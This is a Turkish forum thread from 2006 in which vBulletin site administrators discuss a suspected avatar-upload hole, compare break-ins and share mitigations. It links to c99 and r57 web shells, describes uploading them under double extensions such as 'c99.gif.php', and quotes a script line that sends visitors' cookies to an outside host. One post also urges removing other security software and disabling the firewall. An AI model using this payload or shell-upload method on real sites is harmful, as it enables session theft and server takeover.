Tüm Versiyonu (Orjinalini) Göster : vbulletindeki AÇIK....


Mack
05-04-2006, 00:59
Arkadaşlar son zamanlarda bazı sevdiğim arkadaşlar beni uyardı sağolsunlar bende sizi uyarayım dedim...

Şimdi vbulletinde bir açık var,bu açıkda pcden avatar yükleme seçeneğinde...

Bir php dosyasını bir şekilde avatar olarak upload ediyorlar ve mysqlimize ftpmize varana dek ulaşabiliyorlar...

Buna bir korunma yöntemi yokmudur acaba bunu öğrenmek istiyorum...

Şimdiden teşekkür ediyorum...

dr.farox
05-04-2006, 01:34
Vbulletinden yapılan böyle bir açıklama yok...

no fear
05-04-2006, 07:16
php kabul etmezki nasıl olcak

Mack
05-04-2006, 08:47
evet bende biliyorum yok ama adamlar yapıyor :s

organik81
05-04-2006, 11:04
php dosyası nasıl image dosyasına dönüştürülür ben de merak ettim

ikizbeyin
05-04-2006, 12:21
Bir şekilde kod koyduklarını duydum ama doğrumu bilmem, geçen gün benim üyelerden birini takip ediyordum, üye arama yaptı ama aradığı konu bu:
RLMF42GA2GZ4C
böyle bir konu yok, bunun ne olduğunu bilen varmı?
teşekkürler.

organik81
05-04-2006, 12:47
RLMF42GA2GZ4C .. öyle bir konu olmasa da arayabilir normal.. herhangi bir cihazın çip numarası vs olabilir konular içerisinde diye..

ikizbeyin
05-04-2006, 14:13
Sağol dostum içim rahatladı valla, bu üye gece yarıları geliyor beni şüphelendirmişti, biraz tedirgindim, tekrar teşekkürler ve başarılar dilerim.
Saygılar.

Elazığlı168
05-04-2006, 18:24
bu anlattığınz yöntemle benim 3.5.2 forumumun db bilgilerine ulaşıldı adamlar config.php mize ulaşmışlar ftp cpanel şifrelerini kullanmadan

PUNISHER
06-04-2006, 00:17
Dışardan awatar yüklemeyi kapatın gitsin ;)

darjeling
07-04-2006, 17:22
bizde o zaman config.php yi silsek çalışırmı forum??

Elazığlı168
07-04-2006, 20:05
bizde o zaman config.php yi silsek çalışırmı forum??

hehehe öyle şey olurmu hiç config.php dosyası forumun db ile iletişimini sağlayan dosyadır:D

Mack
08-04-2006, 15:22
Araştırıyorum bulunca nasıl olduğunu açıklyacağım...

Bunu bir şekilde vbulletine bildirsek iyi olur:)

darjeling
08-04-2006, 18:11
valla sakakt bir iş bu avartar yüklemeyi durdurmak lazım şimdilik

izuner
19-04-2006, 14:51
Dostum ben size ciddi bir uyarı yapayım 3.5.4 de imza açığı var adamlar bi kod yazıo yazdığı msjlara bakarken siteleri açılıyor bi de profil resmi kapatın yoksa index yemek kolaylaştırıyor

Mack
20-04-2006, 00:16
imza html kodlarının kullanımını açık bırakırsan olur...

affetmekyok
20-04-2006, 19:22
c99shell.php.gif :) adı bu ;) anlatabildim mi

Mack
20-04-2006, 19:25
bugün sitemi secrethack.org nedeni bilinmeyen sebepden hackledi...

sqle kadar girdiler 3.5.4 de açık çok

nms1s
20-04-2006, 19:45
sacma sacma konusmayın ya, dünyada ne kadar vbulletin 3.5.4 kullanan var biliyor musun Mack? Senin dalgınlıgın yüzünden siten hacklendiyse, bunu 3.5.4'de acık var diye yazamazsın.

Siteni bircok değişik yoldan hackleyebilirler, en basitide oyle veya boyle kontrol paneli sifrelerine erismeleri. Sadece senden kaynaklanmaz, belki sunucunda güvenlik iyi değildir. Örneğin RemoteMach hosting şirketinin, hostinglerinde açık bulundu. Hatta SMS denen türk forum sitesi. Hackleyeceğiz fln dediler, sonra RemoteMach, savcılıga sizi şikayet ederiz deyince, g*tleri yemedi, işte yazıktır, söyledir boyledir diye vazgeçtiler.

Sunucun güvenliyse, sorun sendedir. Acemi bir kullanıcı olabilirsin, koruman yetersiz olabilir, internete internet explorer ile giriyor olabilir ve korsan windows kullanıyor olabilirsin. Tabi bu yüzden ie'n güncellenemeyeceği için şak diye şifrelerine tek bir script ile ulasırlar.

Sunu unutma, 3.5.4'te acık olsa, bundan haberi olan senden once vb olurdu. Ayrıca seni hackleyen lamer grubu, bir anda dünya'daki tüm vb forumları hacklerdi. Bir lamerin, yok ben sadece bir siteyi hackleyim, acık oldugunu gostereyim, acıklarını kapatsınlar dediğini gordun mu? Oyle birsey olsa bile bu durum Jelsoft'a kesin bildirilir merak etme.

Ben yıllık 85 dolar oduyorsam, onların bu işi en güzel derecede yapması lazım ki zaten yapıyorlar, hiç derdin tasan olmasın.

AYRICA EGER NULL SURUM KULLANIYORSAN, zaten burda sitem hacklendi demeye hakkın yok. vBulletin'in sitesinde, Null sürümlerde acık olabileceği yönündeki uyarıları rahat bi sekilde bulabilirsin.

PUNISHER
20-04-2006, 19:49
Arkadaş Çok doğru söylüyor............

izuner
21-04-2006, 16:42
sacma sacma konusmayın ya, dünyada ne kadar vbulletin 3.5.4 kullanan var biliyor musun Mack? Senin dalgınlıgın yüzünden siten hacklendiyse, bunu 3.5.4'de acık var diye yazamazsın.

Siteni bircok değişik yoldan hackleyebilirler, en basitide oyle veya boyle kontrol paneli sifrelerine erismeleri. Sadece senden kaynaklanmaz, belki sunucunda güvenlik iyi değildir. Örneğin RemoteMach hosting şirketinin, hostinglerinde açık bulundu. Hatta SMS denen türk forum sitesi. Hackleyeceğiz fln dediler, sonra RemoteMach, savcılıga sizi şikayet ederiz deyince, g*tleri yemedi, işte yazıktır, söyledir boyledir diye vazgeçtiler.

Sunucun güvenliyse, sorun sendedir. Acemi bir kullanıcı olabilirsin, koruman yetersiz olabilir, internete internet explorer ile giriyor olabilir ve korsan windows kullanıyor olabilirsin. Tabi bu yüzden ie'n güncellenemeyeceği için şak diye şifrelerine tek bir script ile ulasırlar.

Sunu unutma, 3.5.4'te acık olsa, bundan haberi olan senden once vb olurdu. Ayrıca seni hackleyen lamer grubu, bir anda dünya'daki tüm vb forumları hacklerdi. Bir lamerin, yok ben sadece bir siteyi hackleyim, acık oldugunu gostereyim, acıklarını kapatsınlar dediğini gordun mu? Oyle birsey olsa bile bu durum Jelsoft'a kesin bildirilir merak etme.

Ben yıllık 85 dolar oduyorsam, onların bu işi en güzel derecede yapması lazım ki zaten yapıyorlar, hiç derdin tasan olmasın.

AYRICA EGER NULL SURUM KULLANIYORSAN, zaten burda sitem hacklendi demeye hakkın yok. vBulletin'in sitesinde, Null sürümlerde acık olabileceği yönündeki uyarıları rahat bi sekilde bulabilirsin.

+1

Elazığlı168
21-04-2006, 23:40
host güvenli değilse ve sende gerekli önlemleri almadıysan vbulletini suçlamamız doğru olmaz

Mack
21-04-2006, 23:42
size en kısa zamanda ne açık olduğunu yazacağım...

PUNISHER
22-04-2006, 12:42
Valla merak ettim özellikle takip ediyorum konuyu...

kriston
22-04-2006, 23:26
yok arkadaşlar kim ne derse desin 3.5.4'de açıklar çok tamam serverdan da açılkar vardır ancak bu sürümde açıklar var. Avatardan açık oluyor vs. bence acilen 3.5.5 çıkmalı ve açıklar kapatılmalı.

KıLıCaRsLaN
23-04-2006, 14:37
arkadaslar ben sıze bı shell koyucam r57 shell veya c99 shell bu ıkısıde gıf seklınde avatardan bı sekılde sokulabılıyor

http://free.7host07.com/selabani/c99.php

http://free.7host07.com/selabani/rst.dat

buyrun bunları atıyorum c99.gif.php dıye avatara yada prfıl resmı yuklemeden sokup ımage.php kullanıcı ıdınden calıstırıp tum ftp yı rahatca hatta sql u bıle gorebılırsın hatta forum konuları herseye gırebılırsın.cpanelıde bı sekılde bulabılır su komutla

tum serverdakı sıtelerın ftp sıne dalabılırsınız.Eger kod calıstırma ıznı varsa serverda genelde wındows ve lınuxlerde oluyor.Kısacası pc den avatar yukleme ve profıl resmı yuklemeyı ya ebatını kucultun yada boyutu atıyorum 1 kb gıbı yada ıkısınıde kapatın pc den yuklemeyı umarım anlatmısımdır.selametle

KıLıCaRsLaN
23-04-2006, 14:39
komutu yazamadım eger ılgılenen varsa serverdakı tum sıtelerı gormek ıcın olan komutu ozellerıne yazarım restırected access dıye hata verıyor yazmaya calısınca

Elazığlı168
23-04-2006, 16:24
arkadaşlar dün son günlerde 100 ün üstünde 3.5 foruma index basılmıştır dün yine ortağımla benim forumumuza index basıldı avatar açığından htacess dosyasında işlem yapıyorlar vbulletin den açıklama bekliyoruz

Co$kuN
23-04-2006, 16:44
Kardeş php dosyası .jpg .gif yada bmp gibi resim uzantılarına dönüştürülmez..

Profilden resim ekleme acıgı var birde İmzalara resım ekleme acıgı ..

İmzalardakı resım kodlarına mega tag kodu yazılarak threadslar yönlendırme yapılabılıyor.

yada Cok az vereyım kodun yarısı <body><style type=text/css>table, p, td, tr
Bu gibi devam eden kodlarla Threadslara ındex basılabılıyor...

Sızın dedıgınız servara Mysql ya kadar ınen yol c99 Shell dir...
Sızın servarınıza whoıs cekıp bulunan sıtelerın acıklarına bakıyorlar .asp yada .nuke gıbı sıtelere shell c99 u upload edıp tum servarda kol gezıyorlar ..
istedıklerı sıtelerın db lerıne kadar ınılebılıyor..

SelametLe..

Co$kuN
23-04-2006, 16:47
Yukarıda Gürkan ( kılıcarslan ) kardesim belirtmiş .. :) İlk konuya bakarak yazmıştım ben neyse Kolay gelsın herkeze.

kriston
23-04-2006, 16:52
ya arkadaşlar bu açığı vbulletin.com'a ve org'a yazın link atın biz de oradan takip edelim. Saygılar...

Elazığlı168
23-04-2006, 16:54
aramızda ingizlice en iyi bilen organik var o bu konuyu açsa oraya iyi olur

kriston
23-04-2006, 16:58
doğru organik dostum halleder beklemedeyim

organik81
23-04-2006, 21:05
biraz baktım ama vbulletin.com 'da bu konu ile ilgili net açıklama göremedim. ufak tefek buglar var fakat sitenin hacklenmesine ihtimal verecek derecede bir açık resmi olarak rapor edilmemiş vbulletin.com 'da.. gören arkadaş varsa link versin tercüme edelim..

alecan
23-04-2006, 23:55
inşallah yeni version çıkar da onda böle açık yoktuur

Elazığlı168
24-04-2006, 00:06
vbullden bi açıklama yapılmaması ilginç son haberlere göre 240 a yakın vbull forum hacklenmiş %30 u falan lisanslı forumlar yeni sürümü bekliyoruz ama herkes önlemini alsın şakası yok

Tech_Children
24-04-2006, 01:16
Doğru Arif Abinin sitesi nasıl olduysa bide nullda değil hacklendi adamlar kolayca hackliolar bunun bir açığı olması lazımki şöyle bir durum var bende bir yerden duydum PCden Foruma Uploadlamayla Açık oluşuomuş:S

KıLıCaRsLaN
24-04-2006, 17:18
organık ben burda normal konu ıcıde olsa bı komutu yazamıyorum serverdakı sıtelerı gormek ıcın yazılan bı komut c99 da restırected daccess dıye bı hata verıyor nedenı nedır? bırde bu acıgı ben sız anlattım yapılıs seklını

KAPATMAK ICIN

1)ADMIN CPDEN PROFIL RESMI YUKLEMEYI KAPATIN PC DEN YUKLEMNEYI.
2)PC DEN AVATAR YUKLEMEYI KAPATIN AYRICA IMZADA VEYA HERYERDE HTML KOD KULLANIMI KOMPLE KAPATIN.ICINIZ RAHAT OLSUN BOYLE YAPARSANIZ BISEY OLMAZ.

ORGANIK BAHSETTIGIM ACIGI VBULLETINDE KONU ACIP SORARSA IYIOLUR.SELAMETLE

PUNISHER
24-04-2006, 19:55
HTML kapalı yazamassın çünki komut içerisinde tehlikeli olanlar var ve bunu yazmayı engelliyor. ;)

alecan
24-04-2006, 21:40
doğru aslında html kapalı olunca nasıl olsunki benim forumlarıma zarar evrmişlerdi böle kodlarla html yi heryerde kapamak gerekli

PUNISHER
24-04-2006, 21:44
Demek İstediğim Paniğe Kapılıp Yanlış bişeyler Yapmayın arkadaşlar. Hacklenmek knorkusuna kapılıp yaptığınız hata ile bi ne vi sitenizi kendiniz hacklettirmiş olursunuz. html ve dışardan avat yüklemeyi kapatın hatta imzaya eresim yüklemeyi de kapatın olsun bitsin :)

Elazığlı168
24-04-2006, 23:19
benim forumda profil resmi kapalı olmasına rağmen hacklendik bu ara forumu olanlar dikkat etsin şifrelerini çok zor bi şifre yapsınlar bbcode deki html kodlarını kapatın çoğu kişinin gözünden kaçıyor vbulldeki açıkalrdan index basarak hackleyen bir grup çıktı ortaya acımıyorlar

dr.farox
25-04-2006, 00:12
benim forumda profil resmi kapalı olmasına rağmen hacklendik bu ara forumu olanlar dikkat etsin şifrelerini çok zor bi şifre yapsınlar bbcode deki html kodlarını kapatın çoğu kişinin gözünden kaçıyor vbulldeki açıkalrdan index basarak hackleyen bir grup çıktı ortaya acımıyorlar
Yaw şu HTML LER tam nasıl kapatılır ben yetkilerden kıstım ama bide başka yerleri vvarmı acaba sen bi yazda bide oraları kontrol edelim....

bide imzada php kodunu açık bıraksak yinede birşey olurmu

Elazığlı168
25-04-2006, 02:42
php kodu problem değil vbulletin seçenkerlerinden Kullanıcı Profili Seçenekler ,BB Kodu Seçeneklerinde html olan yerleri kapatın

dr.farox
25-04-2006, 12:21
php kodu problem değil vbulletin seçenkerlerinden Kullanıcı Profili Seçenekler ,BB Kodu Seçeneklerinde html olan yerleri kapatın

Onları kapattım zaten ,Avatar ve profil resmini'de kapattım inşallah birşey olmaz...

Kolay Gelsin.

PUNISHER
25-04-2006, 13:53
Ben Tek bişey Söylim Her ne sebeble olursa olsun Durup Dururken Turk Sitesini Hakleyen adamın kanı bozuktur :aaa: :manga:

Elazığlı168
25-04-2006, 17:45
ben bu vbull sitelerine dadanan adamla msndede görüştüm türk türke saldırmaz dedim ama dinlemiyor sıra büyük forumlardaymış ftplere sızıp ordan domainleri almayı planlıyorlarmış aman dikkatli olun

dr.farox
25-04-2006, 17:48
ben bu vbull sitelerine dadanan adamla msndede görüştüm türk türke saldırmaz dedim ama dinlemiyor sıra büyük forumlardaymış ftplere sızıp ordan domainleri almayı planlıyorlarmış aman dikkatli olun

FTP ye sızsalar bile nasıl alacaklar DOMAİNİ anlayamadım :confused:

Elazığlı168
25-04-2006, 18:48
teorik olarak mantıksız gibi duruyor ama ftpden servere ordan domainlere ulaşabilirler tabi domain servere bağlıysa

dr.farox
25-04-2006, 19:21
:) Hıımmss. Dediğin olur ama domaini başka yere almak her zaman fayda var bide mail adresini yazmazsak çalmak zor herhalde

PUNISHER
25-04-2006, 23:54
FTP den domain alınmaz arkadaşım. ftp den hostun içi İÇ edilir sadece :)
onu kim dedi ise hal etmiş......... sıra büyük sitelere gelmiş miş adresimi verirdim ama reklama girer artislere bak. kişisel hatalar yapmayın messengerden hiç bişey kabul etmeyin PC nizde ne kadar antispy,anti virüs,firewal varsa silin ve bunu kullanın
ftp://d-eu-2f.kaspersky-labs.com/beta/kis6.0/english/kis6.en.msi
şifreleride
KIS:
426AD371-6420-4CCF-9888-C9358E4890B1C
5288B4AC-B93C-4C1A-BED0-1AA660DB3D085
68A62B60-CC5A-44A7-BC1F-DBA263FB6A614

KASPERSKY IN KENDİ VERDİĞİ ŞİFRELERDİR CRACK DEĞİLDİR. BUNDAN BAŞKASINI KULLANMAYIN PC NİZDE. Önce kendi güvenliğinizi %100 yapın çünkü herşey , bütün şifreler kendi PC nizde bunu unutmayın arkadaşlar başarılar herkese. Bi kez daha diyorum DURUP DURURKEN TURK SİTESİNE SALDIRAN TURK DEĞİLDİR biz zaten neyin savaşını veriyoruz. Adamlar aptalca bir isim duyurma sevdasına KENDI milletimizin sitesini hackliyor. dedimya kanı bozuk bunların. Ben bunun savaşını Hem gerçekte hemde sanalda veriyorum.

dr.farox
25-04-2006, 23:59
verdiğin program güvenlik duvarına takıldı bide herşeyi silin bunu kurun saçma S

PUNISHER
26-04-2006, 00:02
Kardeşşşşşşşşşşş ftp adresine bak öle konuş. adres nerenin adresi kaspersky ın kendi ftp si ;) ayrıca bu programı kurman için windows un güvenlik duvarını kapayacaksın. o kurulumda sorar zaten kapayayımmı diye ;)

dr.farox
26-04-2006, 00:04
Kaspersky olduğunu gördümde prensip izin vermem geömeye ne yazdım ben zaten

KAPİİİİİİİİİİİİİİŞŞŞŞŞŞŞŞŞŞŞŞŞŞŞ

PUNISHER
26-04-2006, 00:06
Keyfin bilir ;)

Dignified
26-04-2006, 13:13
benim forumda profil resmi kapalı olmasına rağmen hacklendik bu ara forumu olanlar dikkat etsin şifrelerini çok zor bi şifre yapsınlar bbcode deki html kodlarını kapatın çoğu kişinin gözünden kaçıyor vbulldeki açıkalrdan index basarak hackleyen bir grup çıktı ortaya acımıyorlar

Senin forumun admin paneline sızıyor heralde çünkü yeni bir forum başlığı ekliyor ve açıklamasına yönlendirilen adres yazılıyor,

http://aktifnet.net/upload/uploads/1146060421.jpg

Elazığlı168
26-04-2006, 19:31
olabilir bir kez ele geçirdi şifreleri mail adreslerinide değiştirdi neyse yedekle eski hale çevirdim panelide şifreledim ama indexler devam ediyor muhtemelen avatar upload açığından yükledği avatardan işlem yapmaya devam ediyor avatarlarda db de silmeyi düşünüyorum

PUNISHER
27-04-2006, 22:11
Açığı buldum ve kendi sitemde yayınladım arkadaşlar sakın özeline gelen msj ları açmayın detaylarını buradan okuyun Kendi sitem ama REKLAM değil yararlı olsun diye veriyorum adresi
http://www.hackdeface.com/showthread.php?goto=newpost&t=1832

BeTa
02-05-2006, 03:05
Peki avatarı bilgisayardan yüklemeyi naıl engellicez profil msjını htmleleri kapattım ama pc den nasıl olcak avatar yükleme kapatma

organik81
02-05-2006, 09:49
Peki avatarı bilgisayardan yüklemeyi naıl engellicez profil msjını htmleleri kapattım ama pc den nasıl olcak avatar yükleme kapatma
kullanıcı grubu ayarlarından "Kendi Avatarını Yükleyebilir >> Hayır" yapacaksın.

KıLıCaRsLaN
02-05-2006, 16:54
vbulletınde bulunan tum acıkları yazıcam sıze buraya kendı sıtemede 3.5.4 te profıl resmı yuklemede sıteyı deface edebılırsınız onuda yazıcam bıldıgım tum acıkları ozaman anlarsınız hatalarınızı.

PUNISHER
02-05-2006, 18:16
Avar yuklemeyi Kullanıcı Gurupları Yoneticisine girin ve Butun Kullanıcı Gruplarını Düzenleyin. (1) Alt Kısınlarda avatar yukleme yeri var onu kapatırn ( 2 ) Profile resim yukleme var onuda kapatın, ( 3 ) Daha Yukarda Özel mesaj kısmı var 50 al kısımdada 5 yazar bunları 0 yapın açıklar bunlar SAYGILAR. Kapamayanlar Büyük hata yaparlar Yazılarım devam eder ;)

alecan
02-05-2006, 18:59
arkadaşlar bu konudaki son sözümü söylüyotum ne yaparsak yapalım hackden korunmanın yolu yok. Bu öyle bir dünya ki, bu bilgiler hep Kötü insanların eline geçiyor. yada insan hack öğrenince kendini birşey zannedip mi kötü oluyor bilemem. o bilgiler bizde de olsa, o programlar, o kodlar bizdede olsa elbet bizde hacki beceririz. enai değiliz ya. ma genede hackten kurtulmanın yolu yok.

PUNISHER
02-05-2006, 19:17
Msn adresimi al alecan bu kadar umutsuz olma elimden geldiğince yardım ederim.

Vasili
13-05-2006, 17:03
imageyi upload ederken örnek images.jpg.php olarak upload ediliyor vBulletin Bunu Kabul Ediyor Cok Basit Br Yöntem aslında bir çok sitede bu açık war genelde 3.5.4

bybart
17-05-2006, 23:50
admincp klasörüne hostun panelinden şifre koyun kolay kolay zarar veremezler birdaha

organik81
18-05-2006, 00:22
admincp klasörüne hostun panelinden şifre koyun kolay kolay zarar veremezler birdaha
ama vereceğiniz şifre farklı olsun, admin şifrenizle aynı olmasın.. öyle yapıp ta gene hack yiyen gördüm ben.. :)

facia
27-05-2006, 00:10
ama vereceğiniz şifre farklı olsun, admin şifrenizle aynı olmasın.. öyle yapıp ta gene hack yiyen gördüm ben.. :)
arkadaslar organık cok ıyı acıklamıs tsk edıyorum organik ın dedıgını yapın bence bende bır ındex yedım ama 2 saatte kaldırdım sonra hostcumla + hack den anlayan arkadaslarla forum un acıklarını konustuk arastırdık burdan bakmadan adamlar buldu arkadaslar avatar profıl resmı yuklemeyı ıptal edin + admın cp ye giriste member sıfresı + kendı admın sıfrenızı gırın benım tavsıyem bu umarım bır seyler anlatabılmısımdır SAYGILAR facia

FoX
27-05-2006, 00:16
arkadaşlar bu aralar calendar.php dende bi açık bulunmuş cookieler alınıyormuş dikkat edin..

Mack
27-05-2006, 16:38
Elazığlı168

indexler devam ediyor demişsin hiç sqli pcye indirip içerisinde index adresini arattın mı?

bunu dene istersen sql yemiş adamlar benim halen düzeltemedim...

sıfırdan başlayacam herşeye....

hostu aldığınız yeri iyi seçin diyecek başka sözüm yok.

yalın55
31-05-2006, 20:09
Lisanslı vbulletinimi bugun hacklediler ya acık varsa neden aldık ki bu vbulletini

Efe
06-06-2006, 15:56
Arkadaşlar vbulleitn hakkında ne kadar bilginiz var bilemiyorum vbulletin çogu hacker sitesinde bile kullanılmakta ki onlar bile kullanıyor açık olayı sizin dediğiniz gibi image den php ye dönüşüm olmaz.
Sitenizin hacklenme nedenleri.

Her forumdan yada ( alın türkçeleştirdim vs. ) gibi hackleri incelemeden kurmayın eger büyük forumsanız bilmediginiz hackı kurmayın.
vbulletin.com dan orjinal hackı indirip en basiti karşılaştırma yapın çünkü bulletin de ki hackler site tarafından inceleniyor zaten zararlı buldukları hackleri izin vermiyorlar

şifrelerinizi

Akrep_KraL
10-06-2006, 22:35
Arkadaşlar Pnisher Bırda Guzel paylaşım Ve Araştırma yapmış İlk başta Tsk Ederim
Bir Arakaşımızda hacklenmitecek site yok demiş doğru demiş
biride ben para Verdim Vb ye Ama hacklendim demiş
Bak kardeşim sen kendi guvenliğini Saqlıyamıyorsan Trojan Veya keylog yiyerek Siten Gider Bu Sitenin Açığı DEğildir Ama Birde Şöyle Mantık Var ben Paramı VEriyorum lisansımı alıyorum millet nedenn pc den awatar yukelnmiyor Bunuda Vb Yi yazsana Sormka lazım Saygılar :)

huseyinb88
03-08-2006, 18:42
index.jpg.php diye hayıt yapıp sokuyosun bu kadar basit ayrıca php kodu kabul etmez diyen arkadaş vbulletinin php olduğunu bilmioymu acaba ;)

haqqi
17-08-2006, 22:19
index.jpg.php diye hayıt yapıp sokuyosun bu kadar basit ayrıca php kodu kabul etmez diyen arkadaş vbulletinin php olduğunu bilmioymu acaba ;)


eger yuklenen yerde sınama varsa kabul etmez dostum vb php dıye bu demek degılkı her noktada php kod calısacak php ve html bır butundur sen oyle elını kolun u sallayarak her yerden kod sokamazsın. yeterkı sınamalar guclu olsun bu kodu yazacak guclu bır coder olsun. iş burada gercek coder'lere düşüyo aslında butun acıkları onlar kapatır ıyı bır php kodcu bahsettıgımız yerlerden kod calıstırmayı onleyebılır en azından zararlı olanları.

Skadi
23-08-2006, 14:04
Jpg.php seklinde diil direk *.Jpg seklinde sokuyorlar . Ayrica Php diil Html Kodlari Once Aciktan Biraz Bahsediyim Sora Kapatmasndan

<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>


bu kodu *.txt ye kaydedip uzantisini *.jpg olarak kaydednce eyer avatar eklemede HTML aciksa vb bu kodlari kabul ediyo ve kullanicis size bi pm atio avatarimda su su sorun war die ve siz avatara baknca cookiesleriniz o kullanici ya gidio.

Html Taglarini Kapayin acik genellikle 3.5.4 de

Ama tabiki sadece cookiesler gidio sifrenizi alamadklari icin panele ulasamazlar.

yer6
25-10-2006, 02:54
cookie açığı olabilir kardeş normal not defterinde kodları yazıp jpg olarak kaydedersen yazdığın koda göre siteyi yönlendirebilirsin yada adminin ve diğer kullanıcıların cookileri çalablirsin en iyisi resim uploadını kapatmaktır.

TheDeNNiS
10-11-2006, 00:23
karmaşık gerçekten

tugrul32
13-11-2006, 16:56
ya Bence Böyle Bi Açık Olsa TopX Açıgındaki Gibi Meşhur Bişey Olur 10 yaşındaki çocuklar bile yapar bence yok bu saçmalık deneyen varsa bişey diyemem
ayrıca gerçekten varsa deneip çalıştıran spoof diye bir program var bu program admin paneline girmenize yardımcı olur bol şanslar